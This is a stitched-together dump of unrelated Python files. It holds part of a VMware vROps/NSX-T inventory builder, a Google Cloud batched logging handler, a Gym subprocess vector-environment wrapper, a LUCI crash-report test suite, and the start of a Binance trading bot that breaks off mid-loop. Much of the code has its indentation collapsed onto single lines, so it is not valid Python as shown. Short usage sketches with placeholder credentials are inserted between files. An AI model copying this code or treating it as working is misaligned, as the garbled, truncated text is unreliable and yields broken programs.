Vrops.get_nsxt_mgmt_cluster(vrops, target, token, [a.uuid for a in nsxt_adapter]) for adapter_object in nsxt_mgmt_plane.adapter: for mgmt_cluster in nsxt_mgmt_cluster: if mgmt_cluster.parent == adapter_object.uuid: adapter_object.add_mgmt_cluster(mgmt_cluster) logger.debug(f'Collecting NSX-T management cluster: {mgmt_cluster.name}') return nsxt_mgmt_plane def get_vcenters(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: tree[vcenter.target][vcenter.uuid] = { 'uuid': vcenter.uuid, 'name': vcenter.name, 'kind_dc_name': dc.name, 'kind_dc_uuid': dc.uuid, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['vcenters'] = tree return tree def get_datacenters(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: tree[vcenter.target][dc.uuid] = { 'uuid': dc.uuid, 'name': dc.name, 'parent_vcenter_uuid': vcenter.uuid, 'parent_vcenter_name': vcenter.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['datacenters'] = tree return tree def get_datastores(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in 
vcenter.datacenter: for datastore in dc.datastores: tree[vcenter.target][datastore.uuid] = { 'uuid': datastore.uuid, 'name': datastore.name, 'parent_dc_uuid': dc.uuid, 'parent_dc_name': dc.name, 'type': datastore.type, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['datastores'] = tree return tree def get_clusters(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for cluster in dc.clusters: tree[vcenter.target][cluster.uuid] = { 'uuid': cluster.uuid, 'name': cluster.name, 'parent_dc_uuid': dc.uuid, 'parent_dc_name': dc.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['clusters'] = tree return tree def get_hosts(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for cluster in dc.clusters: for host in cluster.hosts: tree[vcenter.target][host.uuid] = { 'uuid': host.uuid, 'name': host.name, 'parent_cluster_uuid': cluster.uuid, 'parent_cluster_name': cluster.name, 'datacenter': dc.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['hosts'] = tree return tree def get_vms(self) -> dict: tree = dict() for vcenter_entry in self.vcenter_dict: vcenter = self.vcenter_dict[vcenter_entry] if not vcenter: continue tree[vcenter.target] = dict() for dc in vcenter.datacenter: for cluster in dc.clusters: for host in cluster.hosts: for vm in host.vms: tree[vcenter.target][vm.uuid] = { 'uuid': vm.uuid, 'name': vm.name, 'parent_host_uuid': host.uuid, 'parent_host_name': host.name, 'cluster': cluster.name, 'datacenter': dc.name, 'vcenter': vcenter.name, 'target': vcenter.target, 'token': vcenter.token, } self.iterated_inventory[str(self.iteration)]['vms'] = tree return tree def get_nsxt_mgmt_cluster(self) -> dict: tree = dict() for nsxt_entry in self.nsxt_dict: nsxt_mgmt_plane = self.nsxt_dict[nsxt_entry] if not nsxt_mgmt_plane: continue tree[nsxt_mgmt_plane.target] = dict() for nsxt_adapter in nsxt_mgmt_plane.adapter: for mgmt_cluster in nsxt_adapter.management_cluster: tree[nsxt_mgmt_plane.target][mgmt_cluster.uuid] = { 'uuid': mgmt_cluster.uuid, 'name': mgmt_cluster.name, 'nsxt_adapter_name': nsxt_adapter.name, 'nsxt_adapter_uuid': nsxt_adapter.uuid, 'target': nsxt_mgmt_plane.target, 'token': nsxt_mgmt_plane.token, } self.iterated_inventory[str(self.iteration)]['nsxt_resources'] = tree return tree
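

# Hedged usage sketch (illustrative only, not part of the exporter): how the
# builder above is typically started. The config path, port and credentials are
# placeholder assumptions; note that the constructor itself enters
# query_inventory_permanent() and therefore never returns, so it is normally
# the entry point of a dedicated process.
def _example_run_inventory_builder():
    os.environ.setdefault("USER", "example-user")          # placeholder credential
    os.environ.setdefault("PASSWORD", "example-password")  # placeholder credential
    # Blocking call: serves /vrops_list, /iteration and the
    # /<target>/<resource>/<iteration> endpoints on port 8000 until the
    # process exits.
    InventoryBuilder(atlas_config='atlas_config.json', port=8000, sleep=300, timeout=120)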
__init__.py
import logging import collections from queue import Queue, Empty from threading import Thread, Event from google.cloud import logging as glogging class GCloudBatchedLogHandler(logging.Handler): """ A batched log handler that sends the log output to Google Cloud Logging service using the Google cloud client library. When creating this handler, authentication for GCloud should be handled using one of the non-explicit credentials sending methods described in http://gcloud-python.readthedocs.io/en/latest/gcloud-auth.html. The handler stores upto batch_length (200 by default) log records or send_interval_in_ms (15 s by default) worth of log records before sending all those log records in a batch. """ def __init__(self, log_name=None, send_interval_in_ms=15000, batch_length=200, *args, **kwargs): """ Create a new GCloudBatchedLogHandler instance. :param log_name: Name of the log. Used as the log name in the gcloud client :type log_name: String :param send_interval_in_ms: Time (in milliseconds) to wait before sending the logs. The logs are sent either when this timeout is reached or when the **batch_length** logs are added. **15000** by default. :type send_interval_in_ms: Integer :param batch_length: Number of log items before sending the logs. **200** by default. :type batch_length: Integer """ super(GCloudBatchedLogHandler, self).__init__(*args, **kwargs) self.send_interval_in_ms = send_interval_in_ms self.batch_length = batch_length self.log_name = log_name self.logger = logging.getLogger("GCloudBatchedLogHandler") # dictionaries to store the queues used as buffers and events used as signals for each log_name self.queues = {} self.events = {} def _send_batch(self, log_name, queue, send_interval_in_ms, event): """ Method used by the threads. Keeps looping until the process is killed. In each loop, it sends all existing log records and waits for the timeout to expire or waits till a signal is sent to start processing (the signal is set when the count exceeds the batch_length member) """ while True: log_records = [] while True: try: log_record = queue.get(block=False) log_records.append(log_record) except Empty: break if len(log_records) > 0: gcloud_logger = glogging.Client().logger(log_name) self.logger.debug("Collected {} log records".format(len(log_records))) batch = gcloud_logger.batch() for log_record in log_records: info = { "message" : self.format(log_record), "python_logger": log_record.name } batch.log_struct(info, severity=log_record.levelname) batch.commit() self.logger.debug("committed {} log records".format(len(log_records))) event.wait(send_interval_in_ms/1000) self.logger.debug("Event set or timeout expired") def emit(self, log_record): log_name = self.log_name or log_record.name or '' # Create the Queue and Event objects for the log_name if they # don't exist already and start a new thread if not log_name in self.queues: self.queues[log_name] = Queue(0) self.events[log_name] = Event() t = Thread(target=self._send_batch, args=(log_name, self.queues[log_name], self.send_interval_in_ms, self.events[log_name])) t.daemon = True t.start() # Add the log_record to the queue target_queue = self.queues[log_name] target_queue.put(log_record) # If the queue size exceeds the batch_length, signal the waiting # thread to start sending the log records if target_queue.qsize() >= self.batch_length: self.logger.debug("Setting the event for {} at queue size {}".format(log_name, target_queue.qsize())) self.events[log_name].set()
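

# Hedged usage sketch (not part of the handler module): attaching the batched
# handler to a standard logger. The logger name, log name, interval and batch
# size below are illustrative; GCloud credentials are expected to be resolved
# implicitly, as described in the class docstring.
def _example_attach_handler():
    app_logger = logging.getLogger("my-app")          # arbitrary example logger
    handler = GCloudBatchedLogHandler(
        log_name="my-app-log",                        # assumed log name
        send_interval_in_ms=5000,                     # flush at least every 5 s
        batch_length=50)                              # ...or once 50 records are buffered
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    app_logger.addHandler(handler)
    app_logger.info("hello from the batched handler")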
subproc_vec_env.py
from multiprocessing import Process, Pipe import numpy as np from gym import spaces from mrl.utils.vec_env import VecEnv, CloudpickleWrapper def _worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.var() while True: try: cmd, data = remote.recv() if cmd == 'step': observation, reward, done, info = env.step(data) if done: observation = env.reset() remote.send((observation, reward, done, info)) elif cmd == 'reset': observation = env.reset() remote.send(observation) elif cmd == 'render': remote.send(env.render(*data[0], **data[1])) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) elif cmd == 'env_method': method = getattr(env, data[0]) remote.send(method(*data[1], **data[2])) elif cmd == 'get_attr': remote.send(getattr(env, data)) elif cmd == 'set_attr': remote.send(setattr(env, data[0], data[1])) else: raise NotImplementedError except EOFError: break class SubprocVecEnv(VecEnv): """ Creates a multiprocess vectorized wrapper for multiple environments :param env_fns: ([Gym Environment]) Environments to run in subprocesses """ def __init__(self, env_fns): self.waiting = False self.closed = False n_envs = len(env_fns) self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(n_envs)]) self.processes = [ Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns) ] for process in self.processes: process.daemon = True # if the main process crashes, we should not cause things to hang process.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() self.goal_env = False self.goal_keys = None if isinstance(observation_space, spaces.Dict): dummy_env = env_fns[0]() self.dummy_env = dummy_env if dummy_env.compute_reward is not None: self.compute_reward = dummy_env.compute_reward if hasattr(dummy_env, 'goal_extraction_function') and dummy_env.goal_extraction_function is not None: self.goal_extraction_function = dummy_env.goal_extraction_function self.goal_env = True self.goal_keys = tuple(observation_space.spaces.keys()) VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs, np.stack(rews), np.stack(dones), infos def reset(self): for remote in self.remotes: remote.send(('reset', None)) obs = [remote.recv() for remote in self.remotes] if self.goal_env: obs = {k: np.stack([o[k] for o in obs]) for k in self.goal_keys} else: obs = np.stack(obs) return obs def close(self): if self.closed: return if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for process in self.processes: process.join() self.closed = True def render(self, mode='human', *args, **kwargs): for pipe in self.remotes: # gather images from subprocesses # `mode` will be taken into account later pipe.send(('render', (args, {'mode': 'rgb_array', **kwargs}))) imgs = [pipe.recv() for pipe in self.remotes] # Create a big image by tiling images from subprocesses bigimg = 
tile_images(imgs) if mode == 'human': import cv2 cv2.imshow('vecenv', bigimg[:, :, ::-1]) cv2.waitKey(1) elif mode == 'rgb_array': return bigimg else: raise NotImplementedError def get_images(self): for pipe in self.remotes: pipe.send(('render', {"mode": 'rgb_array'})) imgs = [pipe.recv() for pipe in self.remotes] return imgs def get_attr(self, attr_name, indices=None): """Return attribute from vectorized environment (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('get_attr', attr_name)) return [remote.recv() for remote in target_remotes] def set_attr(self, attr_name, value, indices=None): """Set attribute inside vectorized environments (see base class).""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('set_attr', (attr_name, value))) for remote in target_remotes: remote.recv() def env_method(self, method_name, *method_args, indices=None, **method_kwargs): """Call instance methods of vectorized environments.""" target_remotes = self._get_target_remotes(indices) for remote in target_remotes: remote.send(('env_method', (method_name, method_args, method_kwargs))) return [remote.recv() for remote in target_remotes] def _get_target_remotes(self, indices): """ Get the connection object needed to communicate with the wanted envs that are in subprocesses. :param indices: (None,int,Iterable) refers to indices of envs. :return: ([multiprocessing.Connection]) Connection object to communicate between processes. """ indices = self._get_indices(indices) return [self.remotes[i] for i in indices] def tile_images(img_nhwc): """ Tile N images into one big PxQ image (P,Q) are chosen to be as close as possible, and if N is square, then P=Q. :param img_nhwc: (list) list or array of images, ndim=4 once turned into array. img nhwc n = batch index, h = height, w = width, c = channel :return: (numpy float) img_HWc, ndim=3 """ img_nhwc = np.asarray(img_nhwc) n_images, height, width, n_channels = img_nhwc.shape # new_height was named H before new_height = int(np.ceil(np.sqrt(n_images))) # new_width was named W before new_width = int(np.ceil(float(n_images) / new_height)) img_nhwc = np.array(list(img_nhwc) + [img_nhwc[0] * 0 for _ in range(n_images, new_height * new_width)]) # img_HWhwc out_image = img_nhwc.reshape(new_height, new_width, height, width, n_channels) # img_HhWwc out_image = out_image.transpose(0, 2, 1, 3, 4) # img_Hh_Ww_c out_image = out_image.reshape(new_height * height, new_width * width, n_channels) return out_image
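

# Hedged usage sketch (illustrative, not part of the wrapper): building a
# SubprocVecEnv from zero-argument environment factories. 'CartPole-v1' is an
# arbitrary example id and the gym import is an extra assumption; the
# action_space attribute is assumed to be stored by the VecEnv base class.
def _example_subproc_vec_env(n_envs=4):
    import gym

    env_fns = [lambda: gym.make('CartPole-v1') for _ in range(n_envs)]
    vec_env = SubprocVecEnv(env_fns)
    obs = vec_env.reset()                                  # stacked observations
    actions = [vec_env.action_space.sample() for _ in range(n_envs)]
    vec_env.step_async(actions)
    obs, rewards, dones, infos = vec_env.step_wait()
    vec_env.close()
    return obs, rewards, dones, infos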
on_error_test.py
#!/usr/bin/env vpython3 # Copyright 2014 The LUCI Authors. All rights reserved. # Use of this source code is governed under the Apache License, Version 2.0 # that can be found in the LICENSE file. import atexit import cgi import getpass import json import logging import os import platform import re import socket import ssl import subprocess import sys import threading import unittest import six from six.moves import BaseHTTPServer # Mutates sys.path. import test_env # third_party/ from depot_tools import auto_stub from six.moves import urllib from utils import on_error PEM = os.path.join(test_env.TESTS_DIR, 'self_signed.pem') def _serialize_env(): return dict((six.ensure_text(k), six.ensure_text(v.encode('ascii', 'replace'))) for k, v in os.environ.items()) class HttpsServer(BaseHTTPServer.HTTPServer): def __init__(self, addr, cls, hostname, pem): BaseHTTPServer.HTTPServer.__init__(self, addr, cls) self.hostname = hostname self.pem = pem self.socket = ssl.wrap_socket( self.socket, server_side=True, certfile=self.pem) self.keep_running = True self.requests = [] self._thread = None @property def url(self): return 'https://%s:%d' % (self.hostname, self.server_address[1]) def start(self): assert not self._thread def _server_loop(): while self.keep_running: self.handle_request() self._thread = threading.Thread(name='http', target=_server_loop) self._thread.daemon = True self._thread.start() while True: # Ensures it is up. try: urllib.request.urlopen(self.url + '/_warmup').read() except IOError: continue return def stop(self): self.keep_running = False urllib.request.urlopen(self.url + '/_quit').read() self._thread.join() self._thread = None def register_call(self, request): if request.path not in ('/_quit', '/_warmup'): self.requests.append((request.path, request.parse_POST())) class Handler(BaseHTTPServer.BaseHTTPRequestHandler): def log_message(self, fmt, *args): # pylint: disable=arguments-differ logging.debug( '%s - - [%s] %s', self.address_string(), self.log_date_time_string(), fmt % args) def parse_POST(self): ctype, pdict = cgi.parse_header(self.headers['Content-Type']) if ctype == 'multipart/form-data': return cgi.parse_multipart(self.rfile, pdict) if ctype == 'application/x-www-form-urlencoded': length = int(self.headers['Content-Length']) return urllib.parse.parse_qs(self.rfile.read(length), True) if ctype in ('application/json', 'application/json; charset=utf-8'): length = int(self.headers['Content-Length']) return json.loads(self.rfile.read(length)) assert False, ctype return None def do_GET(self): self.server.register_call(self) self.send_response(200) self.send_header('Content-type', 'text/plain') self.end_headers() self.wfile.write(b'Rock on') def do_POST(self): self.server.register_call(self) self.send_response(200) self.send_header('Content-type', 'application/json; charset=utf-8') self.end_headers() data = { 'id': '1234', 'url': 'https://localhost/error/1234', } self.wfile.write(json.dumps(data).encode()) def start_server(): """Starts an HTTPS web server and returns the port bound.""" # A premade passwordless self-signed certificate. It works because older # urllib doesn't verify the certificate validity. Disable SSL certificate # verification for more recent version. 
create_unverified_https_context = getattr( ssl, '_create_unverified_context', None) # pylint: disable=using-constant-test if create_unverified_https_context: ssl._create_default_https_context = create_unverified_https_context httpd = HttpsServer(('127.0.0.1', 0), Handler, 'localhost', pem=PEM) httpd.start() return httpd class OnErrorBase(auto_stub.TestCase): HOSTNAME = socket.getfqdn() def setUp(self): super(OnErrorBase, self).setUp() os.chdir(test_env.TESTS_DIR) self._atexit = [] self.mock(atexit, 'register', self._atexit.append) self.mock(on_error, '_HOSTNAME', None) self.mock(on_error, '_SERVER', None) self.mock(on_error, '_is_in_test', lambda: False) class OnErrorTest(OnErrorBase): def test_report(self): url = 'https://localhost/' on_error.report_on_exception_exit(url) self.assertEqual([on_error._check_for_exception_on_exit], self._atexit) self.assertEqual('https://localhost', on_error._SERVER.urlhost) self.assertEqual(self.HOSTNAME, on_error._HOSTNAME) with self.assertRaises(ValueError): on_error.report_on_exception_exit(url) def test_no_http(self): # http:// url are denied. url = 'http://localhost/' self.assertIs(False, on_error.report_on_exception_exit(url)) self.assertEqual([], self._atexit) class OnErrorServerTest(OnErrorBase): def call(self, url, arg, returncode): cmd = [sys.executable, '-u', 'main.py', url, arg] logging.info('Running: %s', ' '.join(cmd)) proc = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ, universal_newlines=True, cwd=os.path.join(test_env.TESTS_DIR, 'on_error')) out = proc.communicate()[0] logging.debug('\n%s', out) self.assertEqual(returncode, proc.returncode) return out def one_request(self, httpd): self.assertEqual(1, len(httpd.requests)) resource, params = httpd.requests[0] self.assertEqual('/ereporter2/api/v1/on_error', resource) self.assertEqual(['r', 'v'], list(params.keys())) self.assertEqual('1', params['v']) return params['r'] def test_shell_out_hacked(self): # Rerun itself, report an error, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'hacked', 0) self.assertEqual([], httpd.requests) self.assertEqual('', out) httpd.stop() def test_shell_out_report(self): # Rerun itself, report an error manually, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'report', 0) expected = ( 'Sending the report ... done.\n' 'Report URL: https://localhost/error/1234\n' 'Oh dang\n') self.assertEqual(expected, out) actual = self.one_request(httpd) self.assertGreater(actual.pop('duration'), 0.000001) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'report'], u'category': u'report', u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'env': _serialize_env(), u'hostname': six.text_type(socket.getfqdn()), u'message': u'Oh dang', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', u'stack': u'None' if six.PY2 else 'NoneType: None', u'user': six.text_type(getpass.getuser()), # The version was added dynamically for testing purpose. u'version': u'123', } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_exception(self): # Rerun itself, report an exception manually, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'exception', 0) expected = ( 'Sending the crash report ... 
done.\n' 'Report URL: https://localhost/error/1234\n' 'Really\nYou are not my type\n') self.assertEqual(expected, out) actual = self.one_request(httpd) self.assertGreater(actual.pop('duration'), 0.000001) # Remove numbers so editing the code doesn't invalidate the expectation. actual['stack'] = re.sub(r' \d+', ' 0', actual['stack']) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'exception'], u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'category': u'exception', u'env': _serialize_env(), u'exception_type': u'TypeError', u'hostname': six.text_type(socket.getfqdn()), u'message': u'Really\nYou are not my type', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', u'stack': u'Traceback (most recent call last):\n' u' File "main.py", line 0, in run_shell_out\n' u' raise TypeError(\'You are not my type\')\n' u'TypeError: You are not my type', u'user': six.text_type(getpass.getuser()), } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_exception_no_msg(self): # Rerun itself, report an exception manually, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'exception_no_msg', 0) expected = ( 'Sending the crash report ... done.\n' 'Report URL: https://localhost/error/1234\n' 'You are not my type #2\n') self.assertEqual(expected, out) actual = self.one_request(httpd) self.assertGreater(actual.pop('duration'), 0.000001) # Remove numbers so editing the code doesn't invalidate the expectation. actual['stack'] = re.sub(r' \d+', ' 0', actual['stack']) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'exception_no_msg'], u'category': u'exception', u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'env': _serialize_env(), u'exception_type': u'TypeError', u'hostname': six.text_type(socket.getfqdn()), u'message': u'You are not my type #2', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', u'stack': u'Traceback (most recent call last):\n' u' File "main.py", line 0, in run_shell_out\n' u' raise TypeError(\'You are not my type #2\')\n' u'TypeError: You are not my type #2', u'user': six.text_type(getpass.getuser()), } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_crash(self): # Rerun itself, report an error with a crash, ensure the error was reported. httpd = start_server() out = self.call(httpd.url, 'crash', 1) expected = ( u'Traceback (most recent call last):\n' u' File "main.py", line 0, in <module>\n' u' sys.exit(run_shell_out(*sys.argv[1:]))\n' u' File "main.py", line 0, in run_shell_out\n' u' raise ValueError(\'Oops\')\n' u'ValueError: Oops\n' u'Sending the crash report ... done.\n' u'Report URL: https://localhost/error/1234\n' u'Process exited due to exception\n' u'Oops\n') # Remove numbers so editing the code doesn't invalidate the expectation. self.assertEqual(expected, re.sub(r' \d+', ' 0', out)) actual = self.one_request(httpd) # Remove numbers so editing the code doesn't invalidate the expectation. 
actual['stack'] = re.sub(r' \d+', ' 0', actual['stack']) self.assertGreater(actual.pop('duration'), 0.000001) expected = { u'args': [u'main.py', six.text_type(httpd.url), u'crash'], u'category': u'exception', u'cwd': os.path.join(test_env.TESTS_DIR, 'on_error'), u'env': _serialize_env(), u'exception_type': u'ValueError', u'hostname': six.text_type(socket.getfqdn()), u'message': u'Process exited due to exception\nOops', u'os': six.text_type(sys.platform), u'python_version': six.text_type(platform.python_version()), u'source': u'main.py', # The stack trace is stripped off the heading and absolute paths. u'stack': u'File "main.py", line 0, in <module>\n' u' sys.exit(run_shell_out(*sys.argv[1:]))\n' u'File "main.py", line 0, in run_shell_out\n' u' raise ValueError(\'Oops\')', u'user': six.text_type(getpass.getuser()), } self.assertEqual(expected, actual) httpd.stop() def test_shell_out_crash_server_down(self): # Rerun itself, report an error, ensure the error was reported. out = self.call('https://localhost:1', 'crash', 1) expected = ( u'Traceback (most recent call last):\n' u' File "main.py", line 0, in <module>\n' u' sys.exit(run_shell_out(*sys.argv[1:]))\n' u' File "main.py", line 0, in run_shell_out\n' u' raise ValueError(\'Oops\')\n' u'ValueError: Oops\n' u'Sending the crash report ... failed!\n' u'Process exited due to exception\n' u'Oops\n') # Remove numbers so editing the code doesn't invalidate the expectation. self.assertEqual(expected, re.sub(r' \d+', ' 0', out)) if __name__ == '__main__': # Ignore _DISABLE_ENVVAR if set. os.environ.pop(on_error._DISABLE_ENVVAR, None) test_env.main()
Binance Detect Moonings.py
""" Disclaimer All investment strategies and investments involve risk of loss. Nothing contained in this program, scripts, code or repositoy should be construed as investment advice.Any reference to an investment's past or potential performance is not, and should not be construed as, a recommendation or as a guarantee of any specific outcome or profit. By using this program you accept all liabilities, and that no claims can be made against the developers, or others connected with the program. """ # use for environment variables import os # use if needed to pass args to external modules import sys # used to create threads & dynamic loading of modules import threading import importlib # used for directory handling import glob # Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC) from colorama import init init() # needed for the binance API / websockets / Exception handling from binance.client import Client from binance.exceptions import BinanceAPIException from requests.exceptions import ReadTimeout, ConnectionError # used for dates from datetime import date, datetime, timedelta import time # used to repeatedly execute the code from itertools import count # used to store trades and sell assets import json # Load helper modules from helpers.parameters import ( parse_args, load_config ) # Load creds modules from helpers.handle_creds import ( load_correct_creds, test_api_key ) from playsound import playsound # for colourful logging to the console class txcolors: BUY = '\033[92m' WARNING = '\033[93m' SELL_LOSS = '\033[91m' SELL_PROFIT = '\033[32m' DIM = '\033[2m\033[35m' DEFAULT = '\033[39m' # tracks profit/loss each session global session_profit session_profit = 0 # print with timestamps old_out = sys.stdout class St_ampe_dOut: """Stamped stdout.""" nl = True def write(self, x): """Write function overloaded.""" if x == '\n': old_out.write(x) self.nl = True elif self.nl: old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}') self.nl = False else: old_out.write(x) def flush(self): pass sys.stdout = St_ampe_dOut() def get_price(add_to_historical=True): '''Return the current price for all coins on binance''' global historical_prices, hsp_head initial_price = {} prices = client.get_all_tickers() for coin in prices: if CUSTOM_LIST: if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS): initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()} else: if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS): initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()} if add_to_historical: hsp_head += 1 if hsp_head == RECHECK_INTERVAL: hsp_head = 0 historical_prices[hsp_head] = initial_price return initial_price def wait_for_price(): '''calls the initial price and ensures the correct amount of time has passed before reading the current price again''' global historical_prices, hsp_head, volatility_cooloff volatile_coins = {} externals = {} coins_up = 0 coins_down = 0 coins_unchanged = 0 pause_bot() if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)): # sleep for exactly the amount of time required time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds()) 
print(f'Working...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}') # retreive latest prices get_price() # calculate the difference in prices for coin in historical_prices[hsp_head]: # minimum and maximum prices over time period min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price'])) max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price'])) threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100 # each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached. if threshold_check > CHANGE_IN_PRICE: coins_up +=1 if coin not in volatility_cooloff: volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE) # only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE): volatility_cooloff[coin] = datetime.now() if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0: volatile_coins[coin] = round(threshold_check, 3) print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}') else: print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}') elif threshold_check < CHANGE_IN_PRICE: coins_down +=1 else: coins_unchanged +=1 # Disabled until fix #print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}') # Here goes new code for external signalling externals = external_signals() exnumber = 0 for excoin in externals: if excoin not in volatile_coins and excoin not in coins_bought and \ (len(coins_bought) + exnumber + len(volatile_coins)) < MAX_COINS: volatile_coins[excoin] = 1 exnumber +=1 print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}') return volatile_coins, len(volatile_coins), historical_prices[hsp_head] def external_signals(): external_list = {} signals = {} # check directory and load pairs from files into external_list signals = glob.glob("signals/*.exs") for filename in signals: for line in open(filename): symbol = line.strip() external_list[symbol] = symbol try: os.remove(filename) except: if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}') return external_list def pause_bot(): '''Pause the script when exeternal indicators detect a bearish trend in the market''' global bot_paused, session_profit, hsp_head # start counting for how long the bot's been paused start_time = time.perf_counter() while os.path.isfile("signals/paused.exc"): if bot_paused == False: print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}') bot_paused = True # Sell function needs to work even while paused coins_sold = sell_coins() remove_from_portfolio(coins_sold) update_coin(coins_bought_file_path, 'stop_loss', 'take_profit') get_price(True) # pausing here if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}') time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL) else: # stop counting the pause time stop_time = 
time.perf_counter() time_elapsed = timedelta(seconds=int(stop_time-start_time)) # resume the bot and ser pause_bot to False if bot_paused == True: print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}') bot_paused = False return def convert_volume(): '''Converts the volume given in QUANTITY from USDT to the each coin's volume''' volatile_coins, number_of_coins, last_price = wait_for_price() lot_size = {} volume = {} for coin in volatile_coins: # Find the correct step size for each coin # max accuracy for BTC for example is 6 decimal points # while XRP is only 1 try: info = client.get_symbol_info(coin) step_size = info['filters'][2]['stepSize'] lot_size[coin] = step_size.index('1') - 1 if lot_size[coin] < 0: lot_size[coin] = 0 except: pass # calculate the volume in coin from QUANTITY in USDT (default) volume[coin] = float(QUANTITY / float(last_price[coin]['price'])) # define the volume with the correct step size if coin not in lot_size: volume[coin] = float('{:.1f}'.format(volume[coin])) else: # if lot size has 0 decimal points, make the volume an integer if lot_size[coin] == 0: volume[coin] = int(volume[coin]) else: volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin])) return volume, last_price def buy(): '''Place Buy market orders for each volatile coin found''' volume, last_price = convert_volume() orders = {} for coin in 